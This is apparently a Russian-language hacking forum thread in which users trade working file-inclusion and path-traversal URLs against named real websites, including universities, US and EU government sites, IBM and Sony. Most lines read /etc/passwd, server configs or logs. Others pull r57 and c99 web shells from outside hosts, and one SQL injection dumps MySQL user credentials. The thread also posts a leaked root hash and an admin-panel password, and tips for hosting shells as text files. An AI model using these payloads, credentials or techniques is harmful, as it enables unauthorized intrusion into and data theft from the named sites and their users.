http://www.dsinsight.com/principal.php?menu=9&abrir=../../../../../../../../../../etc/group
http://www.dsinsight.com/principal.php?menu=9&abrir=../../../../../../../../../../etc/networks
http://www.dsinsight.com/principal.php?menu=9&abrir=../../../../../../../../../../etc/profile

http://www.ssslib.ch/new_site/main.php?acc=[url] :)

куча поддоменов web.psi.ch.....

http://bab.web.psi.ch/events/lela2003/index.php?incl=

php-ru.info


http://php-ru.info/index.php?dn=html&path=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL 2V0Yy9wYXNzd2Q=


Гыгыы, а пишут еще "Проверенные скрипты и сервисы"


UPD:

Я сейчас посмотрел и понял, что такая бага присутствует в моде "парсер html" (dn=html) к cms Danneo CMS, но думаю в уязвимости CMS постить не буду, кто хочет - запостите

Может и боян, нет возможности проерить. =)
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/passwd&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/hosts&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/ftpusers&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/services&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/group&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/bash.bashrc&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/networks&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/profile&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/skel/.bashrc&lan=english
http://www.cs.utb.edu/main.php?page=../../../../../../../../../../etc/php.ini&lan=english
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../etc/passwd
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../etc/hosts
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../etc/ftpusers
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../etc/services
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../etc/group
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../etc/networks
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../etc/profile
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../var/log/apache/error_log
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../var/log/apache/access_log
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../usr/local/apache/logs/error_log
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../usr/local/apache/logs/access_log
http://www.academic.marist.edu/skiteam/index.php?page=../../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../etc/passwd
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../etc/hosts
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../etc/syslog.conf
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../etc/services
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../etc/group
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../etc/profile
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../etc/bashrc
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../etc/skel/.bashrc
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../../../../../../usr/local/apache/conf/httpd.conf
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/passwd
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/hosts
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/syslog.conf
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/services
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/group
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/profile
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/bashrc
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/skel/.bashrc
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/php.ini
http://kcou.missouri.edu/index.php?page=../../../../../../../../../../etc/httpd/conf/httpd.conf
Решил надыбать еду =)

ru Win
http://www.ab-tuning.ru/index.php?href=

http://history.mashaholl.com/history.php?page=../../../../../../../../etc/passwd

http://ar.water.usgs.gov

http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/passwd
http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/hosts
http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/ftpusers
http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/services
http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/group
http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/networks
http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/profile
http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/syslog.conf


http://banshee.ru
http://banshee.ru/main.php?page=../../../../etc/passwd%00
http://banshee.ru/main.php?page=../../../../etc/hosts%00
http://banshee.ru/main.php?page=../../../../etc/services%00
http://banshee.ru/main.php?page=../../../../etc/group%00
http://banshee.ru/main.php?page=../../../../etc/profile%00
http://banshee.ru/main.php?page=../../../../etc/syslog.conf%00

http://abi06.cms-hoster.de/?zeige=[url]

http://www.hh-statik.de/hofmann2/index.php?includemaincontent=[url]

http://www.phr.com/pageDisplay.php?pid=[url]

))
http://spiirit.yum.pl/sklep_new/site.php?file=

http://www.prinzenberger.de/include/index.php?ziel=

http://www.zaz-werdau.de/include/profil/profil.php?ziel=

http://www.photoconcept.ch/~scoutsmeyrin/index.php?menu=

win
http://www.immovent.ch/index2.php?main=

сайт популярной рок группы brainstorm
http://www.brainstorm.lv/main.php?lang=../../../../../../../../../etc/passwd%00
нулл баг собственной персоной)))

Coldplay


http://coldplay.steelista.com/disk.php?id=../../../../../../etc/passwd%00

21.11.07

Windows

http://www.mastellermusic.com/default.php?body=[remote]

23.11.07

linux 2.2.7 MEST 1999 i586

давно таких раритетов не видел))

http://www.vegacom.cz/eng/main.php?body=[remote]

"Всероссийский банк данных
информационно-аналитических материалов
по основным направлениям государственной молодежной политики
Российской Федерации"... шо это значит я хоть убей не понимаю...там и скули есть и пхп инжект и админка есть... дабы не флудить пишу все в PHP инъекции.
http://dmp.mgopu.ru/index.php?link_for_inc=[temote]
админка:
http://dmp.mgopu.ru/admin.php vbdmp/,qfyq

И вообще весь сайт - один сплошной баг (читай - дуршлаг).

provincia.chiet


http://www.provincia.chieti.it/iframe.php?file=../../../../../../etc/passwd%00

www8 можете попробовать))))
http://www.mi2005.de/bd4d/de/servlets/CORE/corecontrol.phtml?content=[remote].inc.php

European Union

http://bookshop.europa.eu/eGetRecords?Template=../../../../etc/passwd%00&indLan=EN;

IBM:
http://publib.boulder.ibm.com/infocenter/wpdoc/v6r0/index.jsp?topic=[url]

Латвийская дизайн-студия "CIMO"http://www.cimo.lv/img.php?img=../index.php%00

FreeBSD 5.5 | 2007
http://aeronic.com/sub.php?path=[remote]

Sony Business Solutions
http://b2b.sony.com/Solutions/page.do?page=/../../../../../../../../../../../../etc/passwd

А куда делся антибоян из этой темы?
http://www.saigontravel.ru/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.kanjiza.co.yu/php_hu/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.iacc-ev.eu/html/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.lamaree.net/php/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.kpabelacrkva.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd

Здесь есть тема: "Вопросы по уязвимостям", там этот вопрос и задай.

http://www.arenasystem.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd

http://www.sptc.ru
http://www.sptc.ru/perl/showfile.fcgi?fsmode=articles&filename=../../../../../../../../../../../../../../etc/passwd
на серваке много всего интересного...

http://sartraccc.sgap.ru


http://sartraccc.sgap.ru/i.php?oper=read_file&filename=../../../../../../../../../../etc/httpd/conf/httpd.conf
http://sartraccc.sgap.ru/i.php?oper=read_file&filename=../../../../../../../../../../etc/passwd
http://sartraccc.sgap.ru/i.php?oper=read_file&filename=../../../../../../../../../etc/my.cnf
http://sartraccc.sgap.ru/i.php?oper=read_file&filename=../../../../../../../../../etc/proftpd.conf

http://parivartan.org.in/index.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.lexambiente.it/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.iva.nl/forceDL.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.gastenzondergrenzen.nl/dl.php?fileName=../../../../../../../../../../../../../../../etc/passwd
http://www.juventusmania.net/juve/html.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.parivartan.org.in/index.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.chinmayamission.org/downloadfile.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.covlifemedia.org/dl_dialog.php?filename=../../../../../../../../../../../../../../../etc/passwd

http://www.informatics.gov.sa/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd

http://www.geo21eye.com/sub2.php?filename=../../../../../../../../../../../../../../../etc/passwd

http://www.smiliez.nl/smiliez.php?filename=../../../../../../../../../../../../../../../etc/passwd

http://www.exyucaffe.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd

давно небыло ремоут(

1. http://www.axisfilmsjakarta.com/main.php?sub=[remote]


2. http://www.exiledfear.com/?q=[remote]
айт хостицo на одном из серверов opentransfer.com. Kому не влом копаться,го на
/hsphere/local/config/httpd/sites/

http://www.cp.uci.edu/php/forcedownload.php?filename=./../../../../../../../../../../../../etc/passwd%00
http://www.budgetoffice.uci.edu/php/forcedownload.php?filename=./../../../../../../../../../../../../etc/passwd%00
http://kinemage.biochem.duke.edu/php/downlode.php?filename=./../../../../../../../../../../../../etc/passwd%00
https://www.egr.msu.edu/ece/Content_Management/read_tutorial.php?filename=./../../../../../../../../../../../../../../../..//egr/sites/www.egr.msu.edu-ssl/htdocs/ece/Content_Management/read_tutorial.php
http://www.clarkson.edu/armyrotc/alumni.php?fileName=./../../../../../../../afs/clarkson.edu/depts/armyrotc/public_html/alumni.php
http://linus.highpoint.edu/~atitus/physlets/physlet.php?filename=./../../../../../../../../../../../../etc/passwd%00

Safe_mode: ON

http://www.appdev.be/Main.php?main=[remote]

Safe_mode: ON
Turkey =)
http://www.savastepe.org/iframe.php?file=[remote]

скиньте ссылку где обо всём этом можно почитать _ а то не понимаю _
в приват плиз

www.parivartan.org.in
http://www.parivartan.org.in/index.php?filename=../../../../../etc/passwd

www.clinlab-kafedra.ru
http://www.clinlab-kafedra.ru/main.php?file=../../../../../../../../../../../../../../../../etc/passwd

trapeza.com.ua

http://trapeza.com.ua/_dp/view2.php?file=../../../../etc/passwd

geo21eye.com

http://www.geo21eye.com/sub2.php?filename=../../../../etc/passwd

http://structures.ucsd.edu/index.php?page=../../../../../../../../../../../../../etc/passwd%00
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../../../../../etc/passwd

http://www.txregionalcouncil.org/display.php?page=../../../../../../../../../../etc/passwd
http://www.txregionalcouncil.org/display.php?page=../../../../../../../../../../etc/hosts
http://www.txregionalcouncil.org/display.php?page=../../../../../../../../../../etc/syslog.conf
http://www.txregionalcouncil.org/display.php?page=../../../../../../../../../../etc/services
http://www.txregionalcouncil.org/display.php?page=../../../../../../../../../../etc/group
http://www.txregionalcouncil.org/display.php?page=../../../../../../../../../../etc/profile
http://www.txregionalcouncil.org/display.php?page=../../../../../../../../../../etc/bashrc
http://www.txregionalcouncil.org/display.php?page=../../../../../../../../../../etc/skel/.bashrc
Давненько не учавствовал в этом =)

http://ff.ku.sk/index.php?page=../../../../../../../../../../etc/passwd
http://ff.ku.sk/index.php?page=../../../../../../../../../../etc/hosts
http://ff.ku.sk/index.php?page=../../../../../../../../../../etc/services
http://ff.ku.sk/index.php?page=../../../../../../../../../../etc/group
http://ff.ku.sk/index.php?page=../../../../../../../../../../etc/profile
http://ff.ku.sk/index.php?page=../../../../../../../../../../etc/bashrc
http://ff.ku.sk/index.php?page=../../../../../../../../../../etc/httpd/conf/httpd.conf
:)

###################################
http://www.nmh.ie/Internet/index.php?page=../../../../../../../../../../etc/passwd
http://www.c4i.ie/index.php?page=../../../../../../../../../../etc/passwd
http://www.techstaff.ie/oz/static.php?page=../../../../../../../../../../etc/passwd
http://www.wrl.unsw.edu.au/coastalimaging/index.php?page=../../../../../../../../../../etc/passwd
http://web.bunburycatholic.wa.edu.au/index.php?page=../../../../../../../../../../etc/passwd
###################################

Вы отстали)) Последняя инъекция была в прошлом году!
http://www.juze-rheinbach.de/index.php?include=../../../../../../../../../../etc/passwd
http://www.juze-rheinbach.de/index.php?include=../../../../../../../../../../etc/hosts
http://www.juze-rheinbach.de/index.php?include=../../../../../../../../../../etc/services
http://www.juze-rheinbach.de/index.php?include=../../../../../../../../../../etc/group
http://www.juze-rheinbach.de/index.php?include=../../../../../../../../../../etc/bash.bashrc
http://www.juze-rheinbach.de/index.php?include=../../../../../../../../../../etc/profile
http://www.juze-rheinbach.de/index.php?include=../../../../../../../../../../etc/skel/.bashrc
http://www.juze-rheinbach.de/index.php?include=../../../../../../../../../../usr/local/apache/conf/httpd.conf

http://www.pnosker.com/index.php?include=../../../../../../../../../../etc/passwd
http://www.pnosker.com/index.php?include=../../../../../../../../../../etc/hosts
http://www.pnosker.com/index.php?include=../../../../../../../../../../etc/services
http://www.pnosker.com/index.php?include=../../../../../../../../../../etc/group
http://www.pnosker.com/index.php?include=../../../../../../../../../../etc/bashrc
http://www.pnosker.com/index.php?include=../../../../../../../../../../etc/profile
http://www.pnosker.com/index.php?include=../../../../../../../../../../etc/skel/.bashrc

http://carl.pappenheim.net/index.php?include=../../../../../../../../../../etc/passwd
http://carl.pappenheim.net/index.php?include=../../../../../../../../../../etc/hosts
http://carl.pappenheim.net/index.php?include=../../../../../../../../../../etc/services
http://carl.pappenheim.net/index.php?include=../../../../../../../../../../etc/group
http://carl.pappenheim.net/index.php?include=../../../../../../../../../../etc/bash.bashrc
http://carl.pappenheim.net/index.php?include=../../../../../../../../../../etc/profile
http://carl.pappenheim.net/index.php?include=../../../../../../../../../../etc/skel/.bashrc
http://carl.pappenheim.net/index.php?include=../../../../../../../../../../usr/local/apache/conf/httpd.conf

еда
http://www.studentmedia.ou.edu/index.php?page=../../../../etc/passwd

permsovprof.ru

http://www.permsovprof.ru/addon.php?Open=main&File=../../../../../../etc/passwd
http://www.permsovprof.ru/addon.php?Open=main&File=../../../../../../etc/hosts
http://www.permsovprof.ru/addon.php?Open=main&File=../../../../../../etc/services
http://www.permsovprof.ru/addon.php?Open=main&File=../../../../../../etc/group
http://www.permsovprof.ru/addon.php?Open=main&File=../../../../../../etc/profile
http://www.permsovprof.ru/addon.php?Open=main&File=../../../../../../etc/skel/.bashrc

Хз, может было
http://www.sgfma.org/sgfma.php?incfile=/etc/passwd
http://www.sgfma.org/sgfma.php?incfile=/etc/hosts
http://www.sgfma.org/sgfma.php?incfile=/etc/syslog.conf
http://www.sgfma.org/sgfma.php?incfile=/etc/services
http://www.sgfma.org/sgfma.php?incfile=/etc/group
http://www.sgfma.org/sgfma.php?incfile=/etc/profile
http://www.sgfma.org/sgfma.php?incfile=/etc/bashrc
http://www.sgfma.org/sgfma.php?incfile=/etc/skel/.bashrc
http://www.sgfma.org/sgfma.php?incfile=/etc/httpd/logs/error_log
http://www.sgfma.org/sgfma.php?incfile=/usr/local/apache/logs/error_log
http://www.sgfma.org/sgfma.php?incfile=/usr/local/apache/logs/access_log
http://www.sgfma.org/sgfma.php?incfile=[url]

www.az-jenata.com

http://www.az-jenata.com/index.php?page=../../../../../etc/passwd%00
http://www.az-jenata.com/index.php?page=../../../../../etc/hosts%00
http://www.az-jenata.com/index.php?page=../../../../../etc/services%00
http://www.az-jenata.com/index.php?page=../../../../../etc/group%00
http://www.az-jenata.com/index.php?page=../../../../../etc/profile%00
http://www.az-jenata.com/index.php?page=../../../../../etc/skel/.bashrc%00
http://www.az-jenata.com/index.php?page=../../../../../usr/local/apache/conf/httpd.conf%00

.edu


http://www.uca.edu.sv/publica/proceso/proceso/proceso.php?id=../../../../../../../../etc/passwd%00
http://www.uca.edu.sv/publica/proceso/proceso/proceso.php?id=../../../../../../../../etc/hosts%00
http://www.uca.edu.sv/publica/proceso/proceso/proceso.php?id=../../../../../../../../etc/services%00
http://www.uca.edu.sv/publica/proceso/proceso/proceso.php?id=../../../../../../../../etc/group%00
http://www.uca.edu.sv/publica/proceso/proceso/proceso.php?id=../../../../../../../../etc/profile%00
http://www.uca.edu.sv/publica/proceso/proceso/proceso.php?id=../../../../../../../../etc/skel/.bashrc%00
http://www.uca.edu.sv/publica/proceso/proceso/proceso.php?id=../../../../../../../../usr/local/apache/conf/httpd.conf%00
http://www.uca.edu.sv/publica/proceso/proceso/proceso.php?id=[url]

http://www.de-line.ru/?module=[url] (без расширения)

Sun Microsystems Laboratories Experimental
http://www.experimentalstuff.com/,id=6ieiid7rt5uuo12t2rmbnl?template.fileName=../../../../../../../../../../../../../../../etc/passwd

http://web.mmc.edu.cn/jiangong/news/note/show.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.sdau.edu.cn/gongyuan/invite/show_temp.php?filename=../../../../../../../../../../../../../../../etc/passwd

http://www.savagewar.co.uk/index.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00

www.hut2.ru - Лучший бесплатный хостинг сайтов в Сети (*Один из айпишек)
http://sungsm.hut2.ru/index.php?file=./../../../../../../../../../../../../../../../../../etc/passwd
http://sungsm.hut2.ru/index.php?file=./../../../../../../../../../../../../../../../../../etc/hosts
http://sungsm.hut2.ru/index.php?file=./../../../../../../../../../../../../../../../../../etc/services

Хостинг www.valuehost.ru
http://order.onehost.ru/order/index.php?hmid=-1004702225+union+select+1,2,3,4,5,6,7,concat_ws(0x 2F,user,password),9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26+from+mysql.user/*
Version:4.0.16-log

admin:

root 75dc61c73bae25f9

www.viza-vi.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

www.adee.dental.tcd.ie - Association for Dental Education in Europe
http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../../../../../../../../etc/passwd

www.structures.ucsd.edu - Structural Engineering
http://structures.ucsd.edu/index.php?page=structural_engineering/../../../../../../../../../../../../../../../../../../../../etc/passwd%00

www.studentmedia.ou.edu - Student Media
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd

http://www.library.lg.ua/rus/about_struktura.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.school.pc-manage.com.ua/index.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
http://www.school.pc-manage.com.ua/index.php?filename=[url]

http://www.planeta.ua/fc/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd


http://www.kievweb.com.ua/~fozzy/getid3/demos/demo.browse.php?listdirectory=%2Fetc

http://dymo.mk.ua/index.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.saigontour.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://pozvonok.ru/forum/Show.php?FileName=[url]%00

http://associaciya.arfp.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.detaling.ru/page.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.officesystems.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.moscowfreespeakers.ru/skin.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://aileiscotch.ru/book/print.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.rkgrinn.ru/EnglishPub/englishpub.php?FileName=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.rkgrinn.ru/Saluun/saloon.php?FileName=../../../../../../../../../../../../../../../../../../etc/passwd

http://tdlab.ru/print.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://ngo.pskov.ru/jewish/elef/index.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=[url]
шелл должен быть на сервере, который не поддерживает php...например www.nm.ru
и в конце ссылки .php не писать...
Значит зпрос будет такой: http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=http://www.site.nm.ru/r57shell

---------------------------------------------------------------

Grey: нда поразительный инклуд, точнее изврат поражает, зачем заливать хрен знает куда шелл без расширения?

Заливаем куда угодно шелл с любым расширением, к примеру txt.

А дальше:

http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=http://www.site.ru/shell.txt?

Со знаком вопроса на конце.

Клубничка...
http://www.wannawatch.com/hosted/index.php?wm_login=tcg4free&cf=y&sub=&site=mrbigdickshotchicks_mov205&page=../../../../../../../etc/passwd

http://www.minprom.bashkortostan.ru/_sfera.php?link=[url]
Министерство промышленности, инвестиционной и инновационной политики Республики Башкортостан

может баян, хз

http://www.ssga.ru/lidar/index.php?flag=14&file=../../../../../../../../../../../../../../../../../../../etc/passwd

Когда-то нагуглил несколько уязвимых шопов, хз какие еще актуальны- кому не лень, проверьте:

3000.com.ua
dinaris.dp.ua
dmcoins.ru
gokom.ru
lidashoes.ru
philatelist.ru
pokupka.net.ua
rosspen.ru
smolotka.kiev.ua
tetramet.ru
vastudio.ru
velomot.com
vitlen.com.ua
vliga.irkutsk.ru
x-group.kiev.ua

Уязвимый скрипт с параметром:
/index.php?aux_page=../cfg/connect.inc.php
В исходнике страницы выводит настройки подключения к mysql

Боевой пример инклуда логов:

http://www.tcnj.edu/~acm/digitalfortress/?id=../../../../../../../../../../local/apps/packages/apache-2.0.59/logs/access_log%00

http://www.physics.wustl.edu/Fac/facDisplayPopUp.php?name=../../../../../../etc/passwd

а вот от меня коллекция!!!
http://www.francismontagnet.com/site.php?page=[INCLUDE]&contentTag=TSS-video.html - UNIX
http://eugeneciurana.com/site.php?page=[INCLUDE]&contentTag=TSS-video.html - UNIX
http://www.sql-articles.com/index.php?page=[INCLUDE] - UNIX
http://www.speedcalibrator.com/template.php3?page=[INCLUDE] - UNIX
http://www.motophoto.com/content_demo/window.php3?section=11&page=[INCLUDE] - UNIX
http://www.izetit.de/index_projekte.php?page=[INCLUDE] - UNIX
http://www.timetech.de/index.php?page=[INCLUDE] - UNIX
http://www.autocad-magazin.de/index.php3?page=[INCLUDE]&naechster=10230 - UNIX
http://www.tux-saar.de/pages/main.php3?page=[INCLUDE] - UNIX
http://tangerinos.free.fr/photos/index.php3?page=[INCLUDE]&categories=03_Ecoles-Colegios&galeries=01_Ecole%20Berchet&ppp=12 - UNIX
http://www.planetemulator.free.fr/galeries/index.php3?page=[INCLUDE]&categories=Stars%20du%20X&galeries=Clara%20Morgane&ppp=12 - UNIX
http://clubrandocar.free.fr/kdpics/index.php3?page=[INCLUDE]&categories=Randocar&galeries=Randocar%20a%20vendre&ppp=12 - UNIX
http://www.serviceformulaire.fr/html/menu.phtml?page=[INCLUDE] - WIN
Юзайте на здоровье

два инклуда интересненьких
http://www.longislandhshockey.net/cgi-bin/anyboard.cgi?fvp=/forum&cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4 vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D
http://www.stylishfetish.com/cgi-bin/anyboard.cgi/board/forum/-=ab=-/index.html?cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4 vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D :cool: :cool: :cool:

http://www.gentek.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd
http://eng.pharmaceutical.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd
http://gentech.ibuilder.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd

http://www.e-daneshjoo.com/parts/lvlr-AlireZA.php
http://www.avivabrasil.com.br/index.php?op=http://www.el-webstudio.de/img/shell.txt?
http://www.coldstore-urk.nl/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://capaliyiz.biz/shell.txt?
http://china.webd.pl/index.php?lang=http://evilc0der.com/fatal.txt?
http://www.nzvikings.dk//pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://kelserific3.iespana.es/r57.txt??
http://www.xavadam.com/index.php?p=http://evilc0der.com/erne.txt?
http://www.cta-usa.org/index2.php?dest=http://www.r57.li/heykir.txt?
http://www.mylxhq.com/bookmarks/index.php/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.evilc0der.com/fatal.txt?
http://gradproekt.ru/index2.php?lang=http://kelserific3.iespana.es/r57.txt??
http://www.dermatologico.org/pagina/index.php?pagina=http://www.gratisweb.com/p4ndr4x_X/pass.txt?
http://www.alton.k12.nh.us/sharedcal//tools/send_reminders.php?noSet=0&includedir=http://rajakoya.freehostia.com/folder/c99.txt?
http://saralta.org/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://evilc0der.com/fatal.txt?
http://www.nchr.com.cn/aboutus/index.php?id=http://kelserific3.iespana.es/r57.txt?
http://www.sinhan.net/zeroboard41//skin/zero_vote/error.php?dir=http://kelserific3.iespana.es/r57.txt??
http://bid4alpacas.com/bid4alpacas/auction/phpAdsNew/view.inc.php?phpAds_path=http://kelserific3.iespana.es/r57.txt?
http://www.azarchsoc.org/aascalendar/tools/send_reminders.php?noSet=0&includedir=http://kelserific3.iespana.es/r57.txt??
http://test1.smumate.co.kr/bbs/include/write.php?dir=http://kelserific3.iespana.es/r57.txt??
http://www.twisfer.org/index.php?pag=http://kelserific3.iespana.es/r57.txt??
http://www.space21c.co.kr/bbs/skin/zero_vote/error.php?dir=http://kelserific3.iespana.es/r57.txt??
http://www.stokvisdennen.nl/index.php?mosConfig_absolute_path=http://ataberk.tv/hacked/cold.txt?
http://www.juegoarriba.com/dw/acardenas/catalog/j.php
http://www.demircililer.org/index.php?page=http://capaliyiz.biz/shell.txt?
http://www.weih.com.tw/appserv/main.php?appserv_root=http://kelserific3.iespana.es/r57.txt??
http://dr-hiv.persiangig.com/shellz/backup.php
http://attitude.nl/~manageme/dami.php
http://www.anaguvenlik.com/safe.php
http://www.purify-zombie.com//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://freewebs.com/senjataku/rina.txt?
http://www.molnet.sk//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://freewebs.com/senjataku/rina.txt?

ой как же мне не стадно нашел инклуд прямо у земляка :)
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/passwd%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/hosts%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/ftpusers%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/syslog.conf%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/services%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/group%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/profile%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/bashrc%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/skel/.bashrc%00
http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/httpd/conf/httpd.conf%00

http://iou.otstudio.com/download.php?upload_filename=../../../../../../../../etc/passwd
TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
### I'm TRYAGI ;) -- Tryag.cc/cc

:)

Linux :
http://www.hotelbrno.cz/page.php?pageinc=http://by-enjoy.t35.com/atik/by.txt?

Linux :
http://www.rowanhilsden.com.au/remote.php

Linux :
http://www.waterless.com/product.php?product=http://by-enjoy.t35.com/atik/by.txt?

Linux :
http://www.all-free-fonts.com/?page=http://www.r57.li/r57.txt??

Win(nt) :
http://www.abruzzowebtv.it/index.php?content=http://drugs.kit.net/c99.txt?

Freebsd :
http://www.identification.net/customer/product.php?xcart_dir=http://source.ie/~collier/outdaed/shuntic?

Linux :
http://www.eloduna.hu/index.php?page=http://source.ie/~collier/outdaed/shuntic?

Good. :)

http://www.portcom.intercom.org.br/index.php?secao=http://

инклуда нет, но весело)))

инклуд картинки с шеллом вконце. Сайт гитарисЦкий;)
http://gtpfiles.ru/?dir=../forum/uploads/av-1278.jpg%00

Гг..
ДРОЧИ.РУ - Каталог порно сайтов
http://www.drochi.ru/index.cgi?category=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

А как ты на него попал?

http://www.vde.net/cgi/rc/samples/dirfull.cgi/etc/passwd

НЕДВИЖИМОСТЬ.com.ua

